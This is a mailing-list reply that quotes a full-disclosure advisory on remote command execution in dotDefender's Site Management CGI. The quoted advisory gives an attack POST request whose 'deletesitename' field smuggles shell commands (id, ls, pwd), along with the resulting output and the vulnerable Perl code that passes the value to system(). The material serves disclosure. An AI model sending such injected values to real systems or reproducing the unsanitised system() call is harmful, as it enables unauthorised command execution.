Re: [Full-disclosure] Remote Command Execution in dotDefender Site Management

[Henri Salo <henri () nerv fi>]

On Mon, 30 Nov 2009 16:48:49 +0100
John Dos <dotdefeater () googlemail com> wrote:

> Problem Description
> ===================
>
> A remote command execution vulnerability exists in the dotDefender
> (3.8-5) Site Management.
>
>
> dotDefender [1] is a web appliaction firewall (WAF) which 'prevents
> hackers from attacking your
> website.'
>
>
> Technical Details
> =================
>
> The Site Management application of dotDefender is reachable as a web
> application (https:site/dotDefender/)
> on the webserver. After passing the Basic Auth login you can
> create/delete applications.
> The mentioned vulnerability is in the 'deletesite' implementation and
> the 'deletesitename' variable.
> Insufficient input validation allows an attacker to inject arbitrary
> commands.
>
>
> Delete Site
> ===========
>
> A normal delete transaction looks as follow:
>
>   POST /dotDefender/index.cgi HTTP/1.1
>   Host: 172.16.159.132
>   User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
> rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
>   Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
>   Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>   Keep-Alive: 300
>   Connection: keep-alive
>   Referer: https://172.16.159.132/dotDefender/index.cgi
>   Authorization: Basic YWRtaW46
>   Cache-Control: max-age=0
>   Content-Type: application/x-www-form-urlencoded
>   Content-Length: 76
>
>   sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
>
> An attack looks like:
>
> --------------------/Request/--------------------
>   POST /dotDefender/index.cgi HTTP/1.1
>   Host: 172.16.159.132
>   User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
> rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
>   Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
>   Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
>   Keep-Alive: 300
>   Connection: keep-alive
>   Referer: https://172.16.159.132/dotDefender/index.cgi
>   Authorization: Basic YWRtaW46
>   Cache-Control: max-age=0
>   Content-Type: application/x-www-form-urlencoded
>   Content-Length: 95
>
>   sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al
> ../;pwd;&action=deletesite&linenum=15
>
> --------------------/Response/--------------------
> [...]
> <br>
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data   99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data   99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data   99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data   99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin
> [...]
>
>
>
> Affected Code
> =============
>
> The affected code (perl) is in index1.cgi of the admin interface:
>
>     311
>     312 }elsif($action eq "deletesite") {
>                     # delete site
>     313         $deletesitename=$postFields{"deletesitename"};
>     314   $dots_index = index($deletesitename,"%3A");
>     315
>     316   if($dots_index != -1 ) {
>     317           $site_a_part=
> substr($deletesitename,0,$dots_index); 318           $site_b_part=
> substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2);
>     319           $site_a_part=&cleanIt($site_a_part);
>     320           $site_b_part=&cleanIt($site_b_part);
>     321           $deletesitename = $site_a_part.":".$site_b_part;
>     322   }
>     323
>     324         $linenum=$postFields{'linenum'};
>     325         applyDbAudit($action);
>     326         &delline($linenum,2);
>     327         cleanSiteFingerPrints($deletesitename);
>     328
>     329         &deleteSiteConf($deletesitename);
>     330         $site_params="$CTMP_DIR/".$deletesitename."_params";
>     331         system("rm -f $site_params");
>
>
> And applicure-lib2.pl:
>
>      13 sub     cleanIt {
>      14         my($param,$type)=@_;
>      15
>      16         $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg;
>      17         if ($type eq 'any') {
>      18         } elsif ($type eq 'filter') {
>      19         $param =~ s/\+/" "/eg;
>      20         } elsif ($type eq 'path') {
>      21         $param = un_urlize($param);
>      22                 #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g;
>      23                 #$param =~ s/\+/" "/eg;
>      24         } else {
>      25                 $param =~ s/([^A-Za-z0-9\-_.~'])//g;
>      26         }
>      27         return $param;
>      28 }
>
>
> Here one can see that certain shell control characters are not
> protected by the call to cleanIt. Thus an attacker
> can gain control of the system call in line 331 of index1.cgi.
>
>
> References
> ===========
>
> [1] http://applicure.com/

Have they fixed this issue? Does this have CVE-identifier assigned?

---
Henri Salo